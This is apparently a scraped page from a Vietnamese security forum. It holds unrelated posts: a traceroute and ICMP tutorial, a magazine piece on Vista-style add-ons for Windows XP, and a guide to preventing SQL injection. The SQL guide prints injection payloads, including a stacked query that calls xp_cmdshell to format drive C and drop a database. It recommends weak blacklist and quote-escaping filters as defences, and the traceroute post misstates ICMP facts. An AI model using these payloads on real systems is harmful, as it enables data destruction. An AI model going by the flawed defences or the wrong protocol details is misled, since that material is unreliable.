Netzero(ISP đã gởi dữ liệu đi) -> Spectranet (một nhà công cấp mạng xương sống - Backbone Provider) -> New York ISP -> New York Backbone -> Asia -> South Asia -> India Backbone -> New Delhi Backbone -> một router khác trong New Delhi Backbone -> New Delhi ISP

Như vậy, host có địa chỉ ip 203.94.12.54 nằm ở New Delhi, India, South Asia! Bạn cũng có thể telnet đến 203.94.12.54 trên cổng 13(datetime) để xác định giờ GMT qua đó bạn có thể biết được vị trí của host này(yêu cầu là host 203.94.12.54 phải chạy daemon datetime và được định cấu hình đúng về thời gian)!

Traceroute hoạt động như thế nào?

Trước hết, bạn cần biết về ICMP, TTL và cách làm việc của các routers(bộ định tuyến)!

Những kiến thức cơ bản

ICMP - Internet Control Message Protocol. ICMP được dùng để thông báo các lỗi xảy ra trong quá trình truyền đi của các gói dữ liệu trên mạng. ICMP thuộc tầng vận huyển - Transpoort Layer! Tầng ứng dụng HTTP FTP Telnet Finger SSH DNS
POP3/IMAP SMTP Gopher BGP
Time/NTP Whois TACACS+ SSL DNS SNMP RIP
RADIUS Archie
Traceroute tftp Ping
Tầng vận chuyển
TCP

UDP

ICMP

OSPF

Tầng Internet
IP

ARP

Tầng vật lí Ethernet/802.3 Token Ring (802.5) SNAP/802.2 X.25 FDDI ISDN
Frame Relay SMDS ATM Wireless (WAP, CDPD, 802.11)
Fibre Channel DDS/DS0/T-carrier/E-carrier SONET/SDH DWDM
PPP HDLC SLIP/CSLIP xDSL Cable Modem (DOCSIS)

Tất cả các ICMP messages đều được chuyển đi cùng với các IP datagrams. Mỗi ICMP message được gói trong IP datagram sẽ có dạng như sau:

+---------------------+-------------------------+
| IP Header(20 bytes) | ICMP message (32 bytes) |
+---------------------+-------------------------+

Sau đây là cấu trúc của một IMCP message: (tham khảo RFC792 để biết thêm!)

0 7 8 15 16 31
+-----------------+-----------------+-----------------+
| Type (0 or 8) | Code (0) | 16-bit Checksum |
+-----------------+-----------------+-----------------+
| Indentifier | sequence number |
+-----------------+-----------------+-----------------+
| |
| Optional Data (nội dung tùy thuộc vào Type và Code) |
| |
+-----------------------------------------------------+

trường type có 15 giá trị khác nhau, tùy thuộc vào từng loại ICMP error message cụ thể. Ví dụ type=3 để chỉ định cho thông báo lỗi "Không đến được đích" - "Destination unreachable" error message!
trường code = sub-error dùng để xác định chính xác lỗi đã xảy ra. Ví dụ, type=3 và code=0 nghĩa là "Network Unreachable"(không đến được mạng); nếu type=3, code=1 nghĩa là "Host Unreachable"(không đến được host)...
TTL - Time to Live. TTL là một trường 8 bit trong IP header(bạn hãy xem lại cấu trúc của IP header!). TTL là thời gian gói dữ liệu tồn tại trên mạng trước khi nó bị bỏ qua. Người gởi dữ liệu đi sẽ xác định một giá trị TTL trước, thường là từ 32 -> 64. Giá trị này sẽ được giảm đi một khi một khi được chuyển qua một bộ định tuyến trên mạng. Khi giá trị này bằng 0, datagram này sẽ bị bỏ qua và giao thức ICMP sẽ báo lỗi về cho người gởi. Điều này sẽ tránh cho datagram này đi vào một vòng lặp vô tận qua các bộ định tuyến.

Mỗi bộ định tuyến khi nhận được IP datagram sẽ giảm giá trị TTL của datagram này đi một. Hầu hết các bộ định tuyến đều không giữ lại datagram này trong thời gian quá 1 giây trước khi chuyển datagram này đi. Nên giá trị TTL có thể coi bằng hop(counter) = số bộ định tuyến mà datagram này vừa vượt qua.

Khi bộ định tuyến nhận được một datagram có trường TTL bằng 0 hoặc 1, nó sẽ không chuyển datagram này đi tiếp. Thay vào đó, nó sẽ bỏ qua datagram này và gởi một ICMP message "Time Exceeded"(quá thời gian) trở lại cho người đã gởi datagram này! Vì ICMP message mà bộ định tuyến gởi trở lại cho người gởi có địa chỉ nguồn - source address là địa chỉ ip của bộ định tuyến này nên người gởi có thể biết được địa chỉ ip của router này!

Cách làm việc của traceroute!

Traceroute gởi một IP datagram có TTL=1 đến hệ thống đích. Router đầu tiên nhận được datagram này sẽ giảm giá trị TTL đi một -> TTL=0 và router này sẽ bỏ qua datagram này(không gởi nó đi tiếp!) và gởi một ICMP error message với địa chỉ ip nguồn là địa chỉ của nó đến máy bạn. Như vậy router có thể xác định địa chỉ ip của router thứ nhất! Sau đó, traceroute sẽ gởi một datagram mới đi với giá trị TTL=2(1+1=2) đến hệ thống đích. Router đầu tiên sẽ giảm giá trị của TTL đi một -> TTL=1(2-1=1) và chuyển datagram này sang router thứ 2. Router thứ 2 nhận được datagram có TTL=1 sẽ giảm TTL=0. Rounter 2 nhận thấy TTL=0 nên nó sẽ không chuyển datagram này đi tiếp. Router 2 sẽ gởi trở lại máy bạn một ICMP error message với địa chỉ ip nguồn là địa chỉ ip của nó(router 2). Như vậy trình traceroute trên máy bạn sẽ biết được router thứ 2 mà datagram đã đi qua. Traceroute sẽ tiếp tục gởi một datagram khác có TTL=3(2+1=3) đi và lặp lại quá trình trên cho đến khi datagram đến được hệ thống đích!

Nếu bây giờ IP datagram đã đến được đích, TTL=1. Host đích sẽ bỏ qua datagram này và nó cũng sẽ không gởi "Time Exceeded" ICMP error message. Như vậy thì bạn sẽ không thể nào biết được là mình đã đến đích chưa?! Traceroute dùng một cơ chế khác như sau:

Traceroute gởi UDP datagrams đến host đích trên các cổng UDP có số hiệu lớn(>30000). Sở dĩ nó chọn các cổng có giá trị lớn vì thường không có ứng dụng nào đang lắng nghe ở các cổng này. Khi host đích nhận được UDP datagram này, nó sẽ gởi trả lại một ICMP error message "Port Unreachable"(không đến được cổng) cho traceroute. Bây giờ thì traceroute có thể phân biệt được sự khác nhau giữa ICMP error message "Time Exceeded" với "Port Unreachable" để biết được đã đến được đích hay chưa?!

Ghi chú: ICMP error message "Time Exceeded" có type=1 và code=0; ICMP eror message "Port Unreachable" có type=3 và code=3

Tổng kết: traceroute gởi UDP datagrams đến host đích với giá trị TTL=1 và được tăng sau mỗi lần để xác định các routers mà datagrams đã đi qua. Mỗi router sẽ gởi trở về một ICMP message "Time Exceeded". Riêng hệ thống đích sẽ gởi trở lại cho traceroute một ICMP message "Port Unreachable". Traceroute dựa vào sự khác biệt này để xác định xem đã đến được đích chưa?!

Ví dụ cuối cùng!

host2 # traceroute xyz.com

traceroute to xyz.com (202.xx.12.34), 30 hops max, 40 byte packets
1 isp.net (202.xy.34.12) 20ms 10ms 10ms
2 xyz.com (202.xx.12.34) 130ms 130ms 130ms

Dòng đầu tiên cho biết hostname và địa chỉ IP của hệ thống đích. Dòng này còn cho chúng ta biết thêm giá trị TTL<=30 và kích thước của datagram là 40 bytes(20-bytes IP Header + 8-bytes UDP Header + 12-bytes user data).

Dòng thứ 2 cho biết router đầu tiên nhận được datagram là 202.xy.34.12, giá trị của TTL khi gởi đến router này là 1. Router này sẽ gởi trở lại cho chương trình traceroute một ICMP message error "Time Exceeded". Traceroute sẽ gởi tiếp một datagram đến hệ thống đích.

Dòng thứ 3, xyz.com(202.xx.12.34) nhận được datagram có TTL=1(router thứ nhất đã giảm một trước đó - TTL=2-1=1). Tuy nhiên, xyz.com không phải là một router, nó sẽ gởi trở lại cho traceroute một ICMP error message "Port Unreachable". Khi nhận được ICMP message này, traceroute sẽ biết được đã đến được hệ thống đích xyz.com và kết thúc nhiệm vụ tại đây.

Trong trường hợp router không trả lời sau 5 giây, traceroute sẽ in ra một dấu sao "*"(không biết) và tiếp tục gởi datagram khác đến host đích!


Tại sao phải chờ Vista?

Những phần mềm bổ sung mang các tính năng của Vista lên XP.

Vista và Schmista bị hoãn. Bạn phải chờ HĐH mới của Microsoft lâu hơn, nhưng bạn có thể có được nhiều tính năng về bảo mật, tốc độ và giao diện của Vista trong Windows XP ngay bây giờ, chỉ tốn ít tiền hoặc thậm chí miễn phí.

Cần tốc độ?


Xem nhiều cửa sổ đang mở cùng lúc và nhấn vào cửa sổ nào muốn phóng lớn bằng công cụ WinPlosion giá 10 USD.

Vista hứa hẹn khởi động và tắt hệ thống nhanh hơn XP, cũng như tăng tốc khởi chạy ứng dụng. SystemBoosterXP () dùng một công nghệ tương tự như "prefetching" của Vista, nhắm trước những tập tin mà bạn thường mở để tăng tốc độ chạy tập tin và ứng dụng. Bạn có thể dùng thử tiện ích này trong vòng 30 ngày, phí đăng ký 20 USD.

Nếu hệ thống của bạn thiếu bộ nhớ, MemoryBoost Pro () sẽ dọn dẹp bộ nhớ, khôi phục những địa chỉ nhớ bị "phí phạm". Nếu một ứng dụng cần đến tất cả dung lượng bộ nhớ thì bạn có thể tạo ra một "boost shortcut" để dọn dẹp bộ nhớ trước khi khởi chạy ứng dụng đó. MemoryBoost Pro giá 20 USD và có thể dùng thử 30 ngày. Nếu tiện ích trên vượt quá túi tiền của bạn thì tiện ích miễn phí Free RAM XP Pro () được thiết kế để làm cũng cùng công việc trên, nhưng một số tính năng "khiêm tốn" hơn.

Bảo mật

Trong Vista, bạn sẽ có thể bảo mật dữ liệu bằng cách đặt khóa mã hóa ổ cứng trên bút nhớ USB gắn ngoài. Nhưng không cần đợi Vista, bạn có thể làm chuyện này cho máy tính xách tay của mình với PCKey giá 70 USD của Kensington () bảo vệ toàn bộ ổ cứng; hoặc với PCKey LE giá 50 USD cũng của hãng () sẽ canh gác những tập tin cá nhân. Bạn phải gắn chiếc "chìa khóa cứng" vào ngõ USB và gõ vào mật mã để mở khóa theo chuẩn bảo mật 128-bit Advanced Encryption Standard và truy cập được dữ liệu. Nếu đăng ký sản phẩm và mật mã của mình tại trang web của Kensington, bạn có thể nhận được hỗ trợ khi mất mật mã và khóa.

Các bậc phụ huynh sẽ vui mừng với khả năng chặn những nội dung theo ý muốn trong Vista. Với 40 USD, SentryPC (f) cũng cho bạn chặn những trang web xấu, giám sát chặt chẽ việc chat, lọc những từ hay cụm từ không hay và không chào đón những ứng dụng lạ lẫm. Bạn có thể giới hạn giờ và ngày mà máy tính hoặc ứng dụng chỉ được chạy. Bản dùng thử mỗi lúc chỉ chạy được 1 giờ, nhưng ít nhất thì bạn cũng được thử qua các tính năng của nó trước khi mua bản đầy đủ.

Bóng bẩy hơn


MemoryBoost Pro giá 20 USD giúp bạn quản lý bộ nhớ của PC hiệu quả hơn.

Giao diện AeroGlass mới của Windows không chỉ khoác bộ áo mới cho các khung cửa sổ, nó còn giúp bạn làm việc hiệu quả hơn bằng cách cho bạn định vị dữ liệu nhanh hơn và di chuyển giữa các cửa sổ nhanh hơn. Ví dụ, Vista sẽ liệt kê các đặc tính của 1 tập tin và nhiều dữ liệu khác trong một khung ở cuối cửa sổ Explorer. Phần mềm miễn phí InfoTip Extension () cũng cho bạn thấy đầy đủ thông tin dạng pop-up khi bạn di chuột đến một biểu tượng tập tin. Bạn cũng có thể tùy biến thông tin hiển thị và thậm chí hiển thị cả nội dung của tập tin văn bản. Nhưng không may là công cụ này lại không cung cấp thông tin gì thêm cho định dạng MP3, WMA, WMV và các tập tin nhạc, phim khác.

Thích phong cách chuyển ứng dụng của Mac, bạn có thể thử ứng dụng WinPlosion giá 10 USD (). Như tính năng Exposé của OS X, di chuyển trỏ chuột đến một góc định trước nào đó sẽ hiển thị mọi cửa sổ đang chạy (ở dạng những cửa sổ thu nhỏ); chỉ việc nhấn chuột vào một trong những cửa sổ đó để mở ra cửa sổ chính.

Nếu muốn có giao diện dạng trong suốt của Vista, bạn có thể mua các công cụ tạo nhiều hiệu ứng trong suốt khác nhau (như Actual Transparent Windows giá 20 USD của Actual Tools, ). Nhưng tại sao lại phải phí tiền? Phần mềm miễn phí có thể làm chuyện này. Để tạo hiệu ứng trong suốt cho cửa sổ hay thanh công cụ, bạn hãy thử TranspApps của Vasilios Freeware ().

PC World Mỹ 06/2006
Theo em thì nên để thêm link Diễn đàn vào các link trên chỗ nội quy vì mỗi khi vào muốn trở lại diễn đàn khi đang xem profile em lại phải nhấp trở lại trang chủ => nhập => mất quá nhiều thời gian . smilie
Phòng tránh SQL Injection như thế nào ?

Hãy suy nghĩ như 1 hackers và thiết kế website của bạn với sự thận trọng tối đa. Như bạn đã thấy , những cách thức tấn công mà tôi ví dụ như trên không hề đòi hỏi 1 sự hiểu biết rộng về SQL mà đơn giản , hackers chỉ ứng dụng tốt những thứ cơ bản và lợi dụng vào ...sự chủ quan của bạn. Qui tắc số 1 trong thiết kế website có tương tác với người sử dụng là : ĐỪNG TIN NHỮNG GÌ USER ĐÁNH VÀO

Một số biện pháp an toàn mà tôi biết được như sau:
* Giới hạn quyền user:
Đừng bao giờ sử dụng Default system account (sa) trong SQL server 2000 bởi vì account này có quá nhiều quyền hành. Bạn nên thiết kế 1 account để chỉ đáp ứng "đủ" những yêu cầu của website. Nếu bạn không sử dụng triggers, stored procedures, user-defined functions,... hãy Remove tất cả. Một trong những thứ hay bị Hackers lợi dụng là xp_cmdshell , xp_grantlogin. Vì vậy , hãy mạnh tay remove tất cả những gì bạn không sử dụng và không chắc sẽ sử dụng.

* Loại bỏ dấu nháy (Quotes)
Như bạn đã thấy , một số cách Injection là lợi dụng sự sơ hở của dấu ' , bằng cách tạo ra 1 hàm loại bỏ dấu ' như sau:


CODE
<%
function stripQuotes(strWords)
stripQuotes = replace(strWords, "'", "''")
end function
%>



Thì câu Injection từ

CODE
select countsmilie from users where userName='john' and
userPass='' or 1=1 --'



Trở thành

CODE
select countsmilie from users where userName='john'' and
userPass=''' or 1=1 --'



Và câu SQL trên trở nên vô nghĩa.

* Cấm những từ "nhạy cảm":
Thông qua 1 số ví dụ trên , chúng ta dễ dàng nhận ra những từ nhạy cảm của SQL là ;, --, select, insert và xp_ . Bằng cách tạo ra 1 hàm để loại bỏ những từ trên:


CODE
<%
function killChars(strWords)
dim badChars
dim newChars
badChars = array("select", "drop", ";", "--", "insert",
"delete", "xp_")
newChars = strWords
for i = 0 to uBound(badChars)
newChars = replace(newChars, badChars(i), "")
next
killChars = newChars
end function
%>



Sử dụng kết hợp giữa stripQuotes và killChars để loại bỏ những từ "nhạy cảm" 1 cách triệt để , hãy xem nếu câu SQL Injection có dạng :


CODE
select prodName from products where id=1; xp_cmdshell 'format
c: /q /yes '; drop database myDB; --



Sẽ trở thành:


CODE
prodName from products where id=1 cmdshell ''format c:
/q /yes '' database myDB


Và hoàn toàn vô nghĩa.

* Giới hạn những gì họ nói:
Bằng cách giới hạn những Textbox và input càng ngắn càng tốt , bạn sẽ giảm thiểu nguy cơ tối đa bị tấn công bằng Injection. Ngoài ra phải kiểm tra những input có dạng số (VD như Product=1) bằng hàm IsNumeric()..

Kết luận:

Những ví dụ trên này chỉ giúp bạn hình dung về SQL Injection và suy nghĩ như Hackers. Thật không thể nào bảo đảm được rằng có 1 cách nào đó có thể chống lại lỗi này và tự bạn phải liên tưởng ra các tình huống cụ thể để bảo vệ server của bạn.

Mặc dù trên đây chúng ta chỉ đưa ra ví dụ với Mircosoft SQL Server , nhưng lỗi SQL Injection xuất hiện trong tất cả các phiên bản của SQL như MySQL , Oracle... và không thể sửa chữa bởi nhà cung cấp vì đó là lỗi sơ xuất của người lập trình web.

Những kiến thức, ví dụ trên đây chỉ nhằm mục đích học tập, bạn không được sử dụng chúng để phá hoại. Chúng tôi không chịu trách nhiệm về bất cứ hành vi nào do người đọc bài viết này gây ra.

 
Go to Page:  First Page Page 16 17 18 19 Page 21 Last Page

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|